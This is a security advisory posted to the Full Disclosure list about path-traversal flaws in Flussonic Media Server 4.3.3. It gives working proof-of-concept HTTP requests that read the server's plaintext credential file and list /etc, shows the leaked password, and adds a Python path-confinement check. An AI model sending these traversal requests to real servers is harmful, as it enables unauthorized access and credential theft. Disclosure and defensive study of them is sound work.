List: full-disclosure
Subject: [FD] Flussonic Media Server 4.3.3 Multiple Vulnerabilities
From: Onur Alanbel <onur.a () windowslive ! com>
Date: 2014-06-29 19:56:22
Message-ID: DUB127-W799C1D67FAE1697EDED9D295050 () phx ! gbl
Document Title:
============
Flussonic Media Server 4.3.3 Multiple Vulnerabilities
Release Date:
===========
June 29, 2014
Product & Service Introduction:
========================
Flussonic is a multi-protocol streaming server with support for many protocols, including HDS, HLS, RTMP, RTSP, HTTP and MPEG-TS. Flussonic can capture multimedia from external sources such as video cameras, satellite TV and other multimedia servers (Wowza, Flash Media Server and Red5).
Flussonic runs on the Erlang platform, which gives it high performance for parallel data processing, fault tolerance across servers, and scaling options up to a distributed network of servers.
Abstract Advisory Information:
=======================
BGA Security Team discovered an arbitrary file read vulnerability and an arbitrary directory listing vulnerability in Flussonic Media Server 4.3.3.
Vulnerability Disclosure Timeline:
=========================
June 26, 2014 : Contact with Vendor
June 26, 2014 : Vendor Response
June 26, 2014 : Version 4.3.4 Deployed
June 29, 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Erlyvideo, LLC
Product: Flussonic Media Server 4.1.25 - 4.3.3
Exploitation Technique:
==================
AFR (Arbitrary File Read): Remote, Unauthenticated
ADL (Arbitrary Directory Listing): Remote, Authenticated
Severity Level:
===========
High
Technical Details & Description:
========================
1. Arbitrary File Read (Unauthenticated)
Any file the server process is permitted to read can be retrieved with a single HTTP GET request whose path contains directory traversal sequences. The credentials for Flussonic's web interface are stored in plaintext in /etc/flussonic/flussonic.conf (the edit_auth directive), so reading that file is enough to log in to the web interface of any affected installation.
2. Arbitrary Directory Listing (Authenticated)
The contents of any directory can be listed by sending an authenticated HTTP GET request to "/flussonic/api/list_files" with the parameter "subpath=<directory>", where the value may contain directory traversal sequences.
Proof of Concept (PoC):
==================
Proof of Concept AFR Request & Response:
GET /../../../etc/flussonic/flussonic.conf HTTP/1.1
Host: 6.6.6.100:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Connection: keep-alive
Server: Cowboy
Date: Thu, 26 Jun 2014 09:50:57 GMT
Content-Length: 191
Content-Type: text/plain
Last-Modified: Tue, 24 Jun 2014 22:10:53 GMT
Etag: 1452b98181c562b2e2d041a3e1fe2af0cffe8687
# Default ports Flussonic M1 Media server listens on
http 80;
http 8080;
rtmp 1935;
rtsp 554;
pulsedb /var/run/flussonic;
edit_auth flussonic letmein!;
live mylive;
file vod {
path priv;
}
Proof of Concept ADL Request & Response:
GET /flussonic/api/list_files?subpath=../../../etc HTTP/1.1
Host: 6.6.6.100:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic Zmx1c3NvbmljOmxldG1laW4h
Connection: keep-alive
HTTP/1.1 200 OK
Connection: keep-alive
Server: Cowboy
Date: Thu, 26 Jun 2014 11:04:12 GMT
Content-Length: 7555
X-Route-Time: 28
X-Run-Time: 8090
Content-Type: application/json
{"files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"},
………
{"name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]}
Solution Fix & Patch:
================
Update to version 4.3.4.
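Whatever the vendor changed in 4.3.4, the property any fix for these two issues has to provide is that a client-supplied path, whether it arrives as the request path or as the subpath parameter, can only ever resolve to a location under the configured root. The check below is an added example of that confinement written in Python; it is not Erlyvideo's code and not a description of what 4.3.4 does. The root directory, the function names and the sample inputs are assumptions; the traversal strings are the ones the advisory's PoC requests use.

```python
"""Confine a client-supplied path to a configured root directory.

Added example, not Flussonic's code and not a description of the 4.3.4
fix. Root paths, function names and the sample inputs are assumptions;
the traversal strings are the ones the advisory's PoC requests use.
"""
import os
from typing import Dict, List, Optional
from urllib.parse import unquote


def confine(root: str, user_path: str) -> Optional[str]:
    """Return the absolute path for user_path under root, or None if it escapes.

    Handles the cases a lexical "does it contain '..'" check gets wrong:
    percent-encoded dots, absolute paths (os.path.join would drop root),
    NUL bytes, a sibling whose name merely starts with the root's name,
    and symlinks inside root that point outside it (realpath follows them).
    """
    decoded = unquote(user_path)
    if "\x00" in decoded:
        return None
    # Treat a leading slash as relative to root, never as the filesystem root.
    relative = decoded.lstrip("/")
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, relative))
    # commonpath compares whole components, so /srv/vodka is not under /srv/vod.
    if os.path.commonpath([root_real, target]) != root_real:
        return None
    return target


def list_files(root: str, subpath: str) -> Optional[List[Dict[str, str]]]:
    """Directory listing in the shape the advisory's list_files response uses,
    refusing anything that resolves outside root."""
    target = confine(root, subpath)
    if target is None or not os.path.isdir(target):
        return None
    entries = []
    for entry in sorted(os.scandir(target), key=lambda e: e.name):
        entries.append({"name": entry.name,
                        "type": "directory" if entry.is_dir() else "file"})
    return entries


if __name__ == "__main__":
    # Assumed root; the candidates include both PoC traversal strings.
    for candidate in ("movies/intro.mp4", "../../../etc", "/etc/passwd",
                      "..%2F..%2F..%2Fetc", "../vodka/x"):
        print(f"{candidate!r:>24} -> {confine('/srv/flussonic/vod', candidate)}")
```

Resolving with realpath before the comparison is what defeats a symlink planted inside the root; it still leaves a window between the check and the open, so on a hardened server the opened file descriptor should be verified as well (for example with fstat against the resolved target) rather than trusting the path alone.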
Security Risk:
==========
The risk of the vulnerabilities above is estimated as high (arbitrary file read) and medium (arbitrary directory listing).
Credits & Authors:
==============
Bilgi Güvenliği Akademisi
Disclaimer & Information:
===================
The information provided in this advisory is provided as is, without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and fitness for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental or consequential loss of business profits, or special damages.
Domain: http://bga.com.tr/advisories.html
Social: http://twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/